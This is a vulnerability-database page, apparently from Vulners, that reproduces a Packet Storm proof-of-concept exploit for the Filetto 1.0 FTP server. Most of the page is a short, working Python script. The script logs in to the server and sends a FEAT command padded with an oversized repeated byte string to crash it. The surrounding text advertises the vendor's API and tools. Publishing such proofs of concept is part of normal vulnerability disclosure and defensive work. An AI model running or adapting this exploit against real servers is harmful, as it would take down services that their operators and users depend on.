Lucene search
K

Filetto 1.0 Denial Of Service

🗓️ 17 May 2020 00:00:00Reported by Socket_0x03Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 163 Views

Filetto v1.0 FTP Server FEAT Command Denial of Servic

Code
`# Exploit Title: Filetto v1.0 - 'FEAT' Denial of Service (PoC)   
# Date: [05-13-2020]  
#  
# Found by: Alvaro J. Gene (Socket_0x03)  
# Email: Socket_0x03 (at) teraexe (dot) com  
# Website: www (dot) teraexe (dot) com  
#  
# Software Link: https://sourceforge.net/projects/filetto  
# Vulnerable Application: Filetto  
# Version: 1.0 (last version. Updated: 01/31/2020)  
# Server: FTP Server  
# Vulnerable Command: FEAT  
# Tested on: Windows XP SP2 and Windows 7 SP1.  
  
  
from socket import *  
  
host = "192.168.0.14"  
port = 2021  
username = "Socket_0x03"  
password = "password"  
  
s = socket(AF_INET, SOCK_STREAM)  
s.connect((host, port))  
print s.recv(1024)  
  
s.send("USER %s\r\n" % (username))  
print s.recv(1024)  
  
s.send("PASS %s\r\n" % (password))  
print s.recv(1024)  
  
buffer = "FEAT "  
buffer += "\x41\x2c" * 11008  
buffer += "\r\n"  
  
s.send(buffer)  
print s.recv(1024)  
  
s.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 May 2020 00:00Current
7.4High risk
Vulners AI Score7.4
163